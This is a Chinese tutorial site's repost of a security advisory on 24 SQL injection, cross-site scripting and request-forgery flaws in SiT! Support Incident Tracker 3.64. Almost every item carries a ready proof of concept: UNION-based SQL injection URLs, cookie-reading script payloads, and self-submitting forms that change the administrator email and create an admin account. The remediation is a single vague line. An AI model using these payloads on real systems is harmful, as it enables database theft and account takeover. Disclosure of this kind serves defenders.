网站地图    收藏   

主页 > 后端 > 网站安全 >

SiT! Support Incident Tracker 3.64多个缺陷及修复 - 网站

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] Advisory Details:High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in SiT! Support Incident Tracker, which can be exploited to perform SQL in......

Advisory Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in SiT! Support Incident Tracker, which can be exploited to perform SQL injection, cross-site scripting, cross-site request forgery attacks.
1) Input passed via the "start" GET parameter to /portal/kb.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:

http:// www.2cto.com /portal/kb.php?start=SQL_CODE_HERE

2) Input passed via the "contractid" GET parameter to contract_add_service.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http:// www.2cto.com /contract_add_service.php?contractid=1%20union%20%28select%20min%28@a:=1%29from%20%28se lect%201%20union%20select%202%29k%20group%20by%20%28select%20concat%28@@version,0x0,@a:=%28@a%2B1%29 %2%29%29%29%20+--+
3) Input passed via the "mode" GET parameter to contact_support.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.
The following PoC code is available:
http:// www.2cto.com /contact_support.php?mode=1%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
4) Input passed via the "contractid" GET parameter to contract_add_service.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.
The following PoC code is available:
http:// www.2cto.com /contract_add_service.php?contractid=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E
5) Input passed via the "user" GET parameter to edit_backup_users.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.
The following PoC code is available:
http:// www.2cto.com /edit_backup_users.php?user=%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
6) Input passed via the "id" GET parameter to edit_escalation_path.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http:// www.2cto.com /edit_escalation_path.php?id=-1%20union%20select%201,version%28%29,user%28%29,4,5,6,7,8 ,9
7) Input passed via the "id" GET parameter to edit_escalation_path.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.
The following PoC code is available:
http:// www.2cto.com /edit_escalation_path.php?id=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
8) Input passed via the Referer parameter to forgotpwd.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.
The following PoC code is available:
GET /forgotpwd.php?userid=1&action=sendpwd HTTP/1.1
Referer: '<script>alert(document.cookie);</script>
9) Input passed via the "unlock" & "lock" GET parameters to holding_queue.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http:// www.2cto.com /holding_queue.php?unlock=%27SQL_CODE_HERE
http:// www.2cto.com /holding_queue.php?lock=%27SQL_CODE_HERE
10) Input passed via the "selected" POST parameter to holding_queue.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
<form action="http:// www.2cto.com /holding_queue.php" method="post">
<input type="hidden" name="selected[]" value="'SQL_CODE_HERE">
<input type="submit" value="exploit">
</form>
11) Input passed via the "action" GET parameter to inbox.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.
The following PoC code is available:
http:// www.2cto.com /inbox.php?action=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
12) Input passed via the "search_string" GET parameter to incident_add.php (when "action" is set to "findcontact") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.
The following PoC code is available:
http:// www.2cto.com /incident_add.php?action=findcontact&search_string=%3Cscript%3Ealert%28document.coo kie%29;%3C/script%3E
13) Input passed via the "inc" POST parameter to report_customers.php (when "mode" is set to "report") is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
<form action="http:// www.2cto.com /report_customers.php?mode=report" method="post">
<input type="hidden" name="inc[]" value="-1) union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 -- ">
<input type="hidden" name="output" value="screen">
<input type="submit" value="exploit">
</form>
14) Input passed via the "table1" POST parameter to report_customers.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.
The following PoC code is available:
<form action="http:// www.2cto.com /report_customers.php" method="post">
<input type="hidden" name="table1" value="'><script>alert(document.cookie);</script>">
<input type="submit" value="exploit">
</form>
15) Input passed via the "table1" POST parameter to report_incidents_by_engineer.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.
The following PoC code is available:
<form action="http:// www.2cto.com /report_incidents_by_engineer.php" method="post">
<input type="hidden" name="table1" value="'><script>alert(document.cookie);</script>">
<input type="submit" value="exploit">
</form>
16) Input passed via the "table1" POST parameter to report_incidents_by_site.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.
The following PoC code is available:
<form action="http:// www.2cto.com /report_incidents_by_site.php" method="post">
<input type="hidden" name="table1" value="'><script>alert(document.cookie);</script>">
<input type="submit" value="exploit">
</form>
17) Input passed via the "inc" POST parameter to report_incidents_by_site.php (when "mode" is set to "report") is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
<form action="http:// www.2cto.com /report_incidents_by_site.php?mode=report" method="post">
<input type="hidden" name="inc[]" value="-1) union select version(),2,3,4,5,6,7,8,9,10 -- ">
<input type="hidden" name="output" value="screen">
<input type="submit" value="exploit">
</form>
18) Input passed via the "startdate" & "enddate" GET parameters to report_incidents_by_vendor.php (when "mode" not empty) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.
The following PoC code is available:
http:// www.2cto.com /report_incidents_by_vendor.php?mode=1&startdate=%3Cscript%3Ealert%281%29;%3C/scrip t%3E&enddate=%3Cscript%3Ealert%282%29;%3C/script%3E
19) Input passed via the "table1" POST parameter to report_marketing.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.
The following PoC code is available:
<form action="http:// www.2cto.com /report_marketing.php" method="post">
<input type="hidden" name="table1" value="'><script>alert(document.cookie);</script>">
<input type="submit" value="exploit">
</form>
20) Input passed via the "start" GET parameter to search.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http:// www.2cto.com /search.php?q=123&domain=incidents&start=SQL_CODE_HERE[code]
21) Input passed via the "sites" GET parameter to transactions.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
[code]http:// www.2cto.com /transactions.php?sites[]=1%20union%20select%201,2,3,4,5,6,7,8,vers ion%28%29,10,11,12,13,14,15,16%20+--+
22) Input passed via the Referer parameter to billable_incidents.php (when "mode" is set to "approvalpage" & "output" is set to "html") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.
The following PoC code is available:
GET /billable_incidents.php?mode=approvalpage&output=html HTTP/1.1
Referer: '><script>alert(document.cookie);</script>
23) Input passed via the Referer parameter to transactions.php (when "display" is set to "html") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.
The following PoC code is available:
GET /transactions.php?display=html HTTP/1.1
Referer: '><script>alert(document.cookie);</script>
24) The application allows users to perform certain actions via HTTP requests without making proper validity checks to verify the requests.
This can be exploited to e.g. change administrator email, add new new administrator or conduct script insertion attacks by tricking an administrator into visiting a malicious web site while being logged-in to the application.
The following PoC is available:
<form action="http:// www.2cto.com /user_profile_edit.php" method="post">
<input type="hidden" name="realname" value="realname">
<input type="hidden" name="mode" value="save">
<input type="hidden" name="submit" value="Save">
<input type="hidden" name="email" value="testemail@test.com">
<input type="hidden" name="userid" value="1">
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>
<form action="http:// www.2cto.com /user_add.php" method="post">
<input type="hidden" name="realname" value="testuser">
<input type="hidden" name="username" value="testuser">
<input type="hidden" name="password" value="password">
<input type="hidden" name="groupid" value="0">
<input type="hidden" name="roleid" value="1">
<input type="hidden" name="jobtitle" value="jobtitle">
<input type="hidden" name="email" value="email@email.com">
<input type="hidden" name="submit" value="Add User">
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>

www.2cto.com提供修复:
针对性对上述分析进行逐条修复

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论